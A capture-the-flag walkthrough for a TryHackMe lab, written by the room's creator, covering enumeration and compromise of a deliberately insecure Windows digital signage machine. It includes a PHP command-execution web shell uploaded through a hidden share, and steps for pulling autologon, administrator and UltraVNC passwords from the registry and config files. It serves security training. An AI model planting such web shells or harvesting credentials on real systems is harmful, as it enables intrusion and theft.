TryHackMe: All Signs Point 2 Pwnage

TryHackMe: https://tryhackme.com/room/allsignspoint2pwnage

Intro

This is the first TryHackMe room I have created, it tries to emulate a rushed and poorly secured Windows Digital Signage system.

Task #1 - Enumeration

How many TCP ports under 1024 are open

For this will use good old nmap, unfortunately the VM takes upto 15mins to boot and services to start.

nmap -Pn -p0-1024 {MACHINE-IP}
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 17:56 GMT
Nmap scan report for allsignspoint2pwnage (10.10.161.50)
Host is up (0.069s latency).
Not shown: 1019 closed ports
PORT    STATE SERVICE
[ REDACTED ]

What is the hidden share

Accessing the a service listed above we find a note. Using this note and knowledge of windows sharing we can guess that the share is

[REDACTED]$

Task #2 - Foothold

Using the hidden share we can upload a php script which we can access via http://machineip/images/ , it may take several attempts to find a php script that will work due to Windows Defender detecting and deleting it.

<?php
echo "You entered <pre>" . $_GET['cmd'];
system($_GET['cmd']);
?>

What user is signed into the console session

Using the above script and quser command we can see the users logged in.

quser USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>[REDACTED]                  console             1  Active      none   

What hidden share is only remotely accessible as an administrative account

Using the net share command we can see what other shares exist

[REDACTED]

What is the content of user.txt

Using the PHP script we can copy the file from the users desktop,

thm{[REDACTED]}

Task #3 - Pwnage

This task is basically to highlight some of the mistakes that can be made and where useful information can be found.

What is the Users Password

The desktop is set to login automatically, there are couple ways of doing this but with this box the registry is used.

[REDACTED]

What is the Administrators Password

The hidden share above contains the installation files used by the techinicien to setup the system. It looks like the Admin password is set the same on machines they configure in order to able to run scripts.

What executable is used to run the installer with the Administrator username and password?

The script above containing the password uses a command so that the password does not need be manually entered, the execuatable is also conatined in this folder.

What is the VNC Password

UltraVNC is installed on the machine, it stores its password encrypted in an ini file. This can be found in the install directory (C:\Pogram Files...) and also in the directory above.

[ultravnc]
passwd=[REDACTED]
passwd2=[REDACTED]
[admin]
UseRegistry=0
SendExtraMouse=1
Secure=0

The file contains 2 passwords, the first is the admin login whilst the second is the view only password. Some research via Google returns vncpwd downloadable from http://aluigi.altervista.org/pwdrec.htm which can be used to decode the encrypted password.

What is the contents of the admin flag

This is on the Administrators Desktops.

Thoughts/Credits

This is the first room I have created and had fun doing so, writing the webpage took me a bit longer than I thought and reminded my how much I dislike javascript.

Hopefull running through this box you have learnt something that you can use in future.

I would like to thank BigMark82 and RockShox my partners in crime. Also shout out to r1gormort1s for encouraging me to make a room, check their room StartUp which was fun to do.